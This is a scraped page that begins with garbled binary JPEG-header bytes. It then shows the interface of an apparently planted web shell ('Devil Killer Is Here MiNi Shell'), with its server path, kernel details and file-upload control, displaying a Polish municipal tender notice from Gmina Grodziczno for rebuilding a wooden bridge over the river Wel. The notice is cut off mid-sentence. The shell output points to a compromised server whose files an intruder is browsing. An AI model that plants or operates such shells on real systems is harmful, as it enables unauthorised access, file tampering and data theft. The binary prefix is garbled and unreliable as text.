JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240529/0034460801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa mostu drewnianego przez rzekę Wel w miejscowości Trzcin Gmina Grodziczno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Grodziczno</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Grodziczno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118900</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grodziczno 17a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grodziczno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">13-324</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">564729722</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">benia@grodziczno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.grodziczno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa mostu drewnianego przez rzekę Wel w miejscowości Trzcin Gmina Grodziczno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e99fc02-1d9b-11ef-a7c1-72acb4a2af8f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00344608</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00001191/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa mostu drewnianego przez rzekę Wel w miejscowości Trzcin Gmina Grodziczno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug_grodziczno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ug_grodziczno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem plat-formazakupowa.pl pod adresem: Profil Nabywcy - Gmina Grodziczno<br/>(platformazakupowa.pl). Wymagany podpis kwalifikowany/zaufany/osobisty)<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w<br/>tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i<br/>formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość<br/>do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza,<br/>opcjonalnie, komunikację za pośrednictwem poczty elektronicznej.<br/>Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>wykonawcy.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl,<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl,<br/>w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie<br/>oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/>nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221<br/>Ustawy Prawo Zamówień Publicznych.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej: RODO, Zamawiający informuje, że:<br/>a) administratorem Pani(a) danych osobowych jest podmiot wskazany w pkt. I ppkt. 1 i 2 niniejszego<br/>Rozdziału SWZ,<br/>b) kontakt z inspektorem ochrony danych osobowych u Zamawiającego można uzyskać pod adresem email: iod@grodziczno.pl,<br/>c) Pani(a) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego,<br/>d) odbiorcami Pani(a) danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy,<br/>e) Pani(a) dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekroczy 4 lata – okres przechowywania obejmie cały czas<br/>trwania umowy (art. 78 ust. 4 ustawy),<br/>f) obowiązek podania przez Panią(a) danych osobowych bezpośrednio Pani(a) dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy,<br/>g) w odniesieniu do Pani(a) danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>2. Posiada Pan(i):<br/>a) na podstawie art. 15 RODO – prawo dostępu do danych osobowych Pani(a) dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia),<br/>b) na podstawie art. 16 RODO – prawo do sprostowania Pani(a) danych osobowych, przy czym skorzystanie z tego prawa nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników,<br/>c) na podstawie art. 18 RODO – prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo to nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d) prawo do wniesienia skargi do organu nadzorczego, gdy uzna Pan(i), że przetwarzanie danych osobowych Pani(a) dotyczących<br/>narusza przepisy RODO – organem tym jest Prezes Urzędu Ochrony Danych Osobowych z siedzibą przy ul. Stawki 2, 00-193<br/>Warszawa.<br/>3. Nie przysługuje Pani(u):<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO – prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO – prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>przekazanych danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 8 a ust. 5 ustawy Pzp Zamawiający informuje, że:<br/>1) W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego<br/>wysiłku, Zamawiający może żądać od osobowy, której dane dotyczą, wskazania do takowych informacji, mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielnie zamówienia publicznego lub konkursu<br/>(art. 8a ust. 2 ustawy Pzp);<br/>2) Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielnie zamówienia publicznego lub konkursu (art. 8a ust. 4 ustawy Pzp)<br/>3) W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego<br/>wysiłku, zamawiający może żądać od osoby. Której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na<br/>celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia (art. 97 ust. 1a ustawy Pzp).<br/>Obowiązek informacyjny Wykonawcy<br/>1) W przypadku, gdy Wykonawca ubiegający się o udzielenie zamówienia publicznego pozyskał bezpośrednio lub pośrednio dane<br/>osobowe osób fizycznych, których te dane dotyczą i które przekazuje Zamawiającemu, jest zobowiązany do wypełnienia obowiązku<br/>informacyjnego względem tych osób, wynikającego z art. 13 i art. 14 RODO.<br/>2) W przypadku, o którym mowa w pkt 1 Wykonawca jest zobowiązany do złożenia oświadczenia o następującej treści:<br/>„Oświadczam(y), że w wypełniłem(liśmy) obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych,<br/>od których dane osobowe bezpośrednio lub pośrednio pozyskałem(liśmy)w celu ubiegania się o udzielnie zamówienia publicznego w<br/>niniejszym postępowaniu”.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IP.271.1.8.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Inwestycja obejmuje przebudowę mostu drewnianego przez rzekę Wel w miejscowości Trzcin Gmina Grodziczno.<br/>2. Przedmiot zamówienia obejmuje realizację, między innymi: roboty rozbiórkowe drewnianego mostu, roboty<br/>przygotowawcze, roboty ziemne, wykonanie nowego obiektu mostowego wraz z dojazdami, montaż znaków pionowych,<br/>uporządkowanie terenu przyległego.<br/>3. Obiekt mostowy zlokalizowany jest w południowej części gminy Grodziczno, w km 0+180 drogi wewnętrznej od drogi<br/>gminnej 183023N Trzcin – Chełsty.<br/>4. Istniejący obiekt to czteroprzęsłowy most drewniany, na którym z uwagi na zły stan techniczny został wstrzymany ruch.<br/>Istniejący obiekt inżynierski to drogowy most drewniany, który zajmuje nieruchomość w pasie drogowym drogi wewnętrznej i<br/>przecina rzekę Wel w km 33+061 jej biegu pod kątem 90 º. Schemat statyczny mostu to belka czteroprzęsłowa o rozpiętości przęsła 3,05 m. Podpory mostu wykonane są z pali drewnianych zakończonych oczepem. W schemacie mostu występuje<br/>pięć rzędów podpór palowych z której każda liczy cztery pale o średnicy d = 25-30 cm. Konstrukcję nośną mostu stanowią<br/>belki drewniane 18x24 cm. Konstrukcja jezdni wykonana jest w postaci pokładu drewnianego z dylina górna i dolną. Do<br/>mostu z dwóch stron prowadzi droga gruntowa nieutwardzona. Zabezpieczenie ruchu na obiekcie stanowi drewniana<br/>balustrada.<br/>5. Projektowane zagospodarowanie terenu zakłada całkowitą rozbiórkę istniejącego obiektu i zastąpienie go nową<br/>konstrukcją mostu. Rozwiązanie projektowanego mostu to most żelbetowy wykonany z dźwigarów stalowych. Przyjęte<br/>rozwiązanie nie zakłuci przepływu wód oraz umożliwi podwyższenie parametrów technicznych, eksploatacyjnych i<br/>użytkowych oraz podwyższenie obecnej nośności do nośności odpowiadającej kl. II wg LM1 (PN-EN 1991-2). Posadowienie<br/>konstrukcji zaprojektowano na żelbetowych przyczółkach i fundamentach pośrednio posadowionych w osłonie ścianek<br/>szczelnych. Zaprojektowano również najazdy do mostu w postaci nasypów wykonanych w technologii z gruntu zbrojonego.<br/>Zabezpieczenie ruchu na moście stanowi mostowa barieroporęcz stalowa.<br/>6. Nie ingeruje się w istniejącą infrastrukturę podziemną.<br/>7. Odwodnienie nawierzchni oraz korpusu drogowego jest realizowane powierzchniowo na przyległy teren, do istniejących<br/>rowów przydrożnych.<br/>8. Przedmiot zamówienia musi zostać wykonany zgodnie z opracowanym projektem budowlanym, pozwoleniem<br/>wodnoprawnym oraz przedmiarem robót.<br/>9. Wykonawca robót zobowiązany jest do opracowania i zatwierdzenia projektu organizacji ruchu na czas robót.<br/>10. Zakres robót został ujęty w przedmiarach robót, które stanowią część niniejszej dokumentacji postępowania i stanowią<br/>element dla skalkulowania ceny ostatecznej, ofertowej. Wykonawca nie może korygować zakresu robót umieszczonych w<br/>przedmiarze robót. Jeżeli natomiast w wyniku dokonanej przez siebie analizy i obliczeniach dostrzegł nieprawidłowości, to<br/>wyjaśnienia wszelkich wątpliwości może dochodzić procedurą pytań, zgodnie z art. 284 Pzp.<br/>11. W przypadku stwierdzenia braków, wad lub sprzeczności w dostarczonych przez Zamawiającego do opracowania<br/>kosztorysu ofertowego materiałach, Wykonawca powinien niezwłocznie o tym fakcie powiadomić Zamawiającego przed<br/>upływem terminu składania ofert.<br/>12. Wykonawca odpowiada za ochronę instalacji na powierzchni ziemi i za urządzenia podziemne takie jak rurociągi, kable<br/>itp. oraz uzyska od odpowiednich władz będących właścicielami tych urządzeń potwierdzenie informacji dostarczonych mu<br/>przez Zamawiającego w ramach planu lokalizacji. Wykonawca zapewni właściwe oznaczenie i zabezpieczenie przed<br/>uszkodzeniem tych instalacji i urządzeń w czasie trwania budowy. Wykonawca będzie odpowiadać za wszelkie<br/>spowodowane przez niego działania uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych.<br/>13. Wykonawca zobowiązany jest znać wszystkie przepisy wydane przez władze centralne i miejscowe oraz inne przepisy i<br/>wytyczne, które są w jakikolwiek sposób związane z robotami i będzie w pełni odpowiedzialny za przestrzeganie tych praw,<br/>przepisów i wytycznych podczas prowadzenia robót.<br/>14. Wszystkie odpowiednie materiały pozyskane na terenie budowy zostaną wykorzystane lub odwiezione na odkład<br/>odpowiednio do wymagań umowy lub wskazań zamawiającego.<br/>15. Dla wszystkich materiałów odpadowych powstałych podczas realizacji inwestycji, Wykonawca wskaże numery bdo<br/>(Baza danych o produktach i opakowaniach oraz o gospodarce odpadami) na podstawie art. 63 ustawy o odpadach.<br/>Wykonawca dokona utylizacji materiałów odpadowych na własny koszt.<br/>16. Wykonawca jest odpowiedzialny za jakość zastosowanych materiałów i wykonanych robót i za ich zgodność z<br/>dokumentacją projektową.<br/>17. Wykonawca ponosi odpowiedzialność za dokładne wytyczenie w terenie i wyznaczenie wysokości wszystkich<br/>elementów robót zgodnie z wymiarami i rzędnymi określonymi w dokumentacji projektowej lub przekazanymi na piśmie<br/>przez zamawiającego. W przypadku gdy materiały lub roboty nie będą zgodne z dokumentacją projektową, to takie materiały<br/>będą niezwłocznie zastąpione innymi, a roboty wykonane zostaną rozebrane na koszt wykonawcy. Wykonawca<br/>zobowiązany jest do przeprowadzenia badań w celu udokumentowania, że materiały uzyskane z dopuszczalnego źródła w<br/>sposób ciągły spełniają wymagania zgromadzone w dokumentacji technicznej. Każdy materiał lub produkt nieposiadający<br/>odpowiednich atestów, certyfikatów, itd. niezaakceptowany przez Zamawiającego, który został wbudowany lub użyty przez<br/>Wykonawcę będzie podlegał wymianie na właściwy. Wykonawca musi liczyć się z ryzykiem, że niewłaściwy materiał<br/>wbudował na własny koszt i będzie musiał go wymienić także na własny koszt. W przypadku, jeżeli Wykonawca nie wymieni<br/>niewłaściwego materiału, Zamawiający zleci jego wymianę na koszt Wykonawcy.<br/>18. Cena oferty musi zawierać wszelkie koszty niezbędne do zrealizowania zamówienia wynikające wprost z dokumentacji<br/>projektowo-kosztorysowej jak i również w niej nie ujęte, a bez których nie można wykonać zamówienia. Wykonawca musi<br/>przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia.<br/>19. Zakres prac oraz odpowiedzialności wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje także koszty<br/>wszystkich robót, bez których realizacja zamówienia byłaby nie możliwa, a w szczególności:<br/>a) organizację i zagospodarowanie zaplecza budowy,<br/>b) organizowanie i prowadzenie niezbędnych prób, badań i odbiorów oraz ewentualnego uzupełnienia dokumentacji<br/>odbiorczej zakresu robót objętych przedmiotem przetargu,<br/>c) wykonanie dokumentacji powykonawczej,<br/>d) po zakończeniu robót doprowadzenie terenu do stanu pierwotnego oraz jego uporządkowanie,<br/>e) koszty ubezpieczenia budowy i robót z tytułu szkód, które mogą zaistnieć w związku ze zdarzeniami losowymi,<br/>odpowiedzialności cywilnej oraz następstw nieszczęśliwych wypadków, dotyczących pracowników i osób trzecich, które to<br/>wypadki mogą powstać w związku z prowadzonymi robotami budowlanymi oraz innych zobowiązań wynikających z umowy.<br/>f) materiały i urządzenia należy zastosować zgodnie z dokumentacją techniczną.<br/>20. Gdy w treści dokumentacji, w tym na rysunkach, w specyfikacjach technicznych wykonania i odbioru robót,<br/>przedmiarach zostały wskazane pochodzenie, znaki towarowe, producenta, dostawcy materiałów lub normy, aprobaty, systemy itp., Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych, czyli takich, które zagwarantują<br/>realizację przedmiotu zmówienia w zgodzie z zapisami opisu przedmiotu zamówienia i zapewnią uzyskanie parametrów<br/>technicznych nie gorszych od założonych w w/w dokumentach. Jeżeli Wykonawca zamierza zastosować rozwiązania<br/>równoważne i wykaże to w ofercie przetargowej, to jest zobowiązany w treści oferty udokumentować i potwierdzić w sposób<br/>jednoznaczny, że zastosowane materiały, urządzenia, systemy itp. będą odpowiadały wskazanym w opisie przedmiotu<br/>zamówienia w stopniu co najmniej równym w zakresie cech funkcjonalnych, jakościowych oraz estetycznych. Jeżeli<br/>Wykonawca zamierza skorzystać z tego uprawnienia, i nie wykaże na etapie składania ofert równoważności zastosowanych<br/>materiałów, urządzeń, systemów itp., to będzie to skutkowało odrzuceniem oferty jako niezgodnej ze Specyfikacją<br/>Warunków Zamówienia w aspekcie opisu przedmiotu zamówienia. Jeżeli Wykonawca zamierza skorzystać z tego<br/>uprawnienia wskazane jest, aby poza udokumentowaniem tej równoważności do każdej pozycji zastosowanego materiału,<br/>urządzenia, systemu itp. sporządził odrębnie arkusz porównawczy, w którym wskaże wymogi zawarte w opisie przedmiotu<br/>zamówienia i cechy równoważności.<br/>21. W przypadku rozbieżności w dokumentach stosowane będą wymagania bardziej rygorystyczne. Przez wymagania takie<br/>rozumie się zwiększone parametry techniczne wykonywanych robót, ilość zaplanowanych do wykonania robót budowlanych<br/>w tym ilość metrów bieżących czy kwadratowych realizowanych 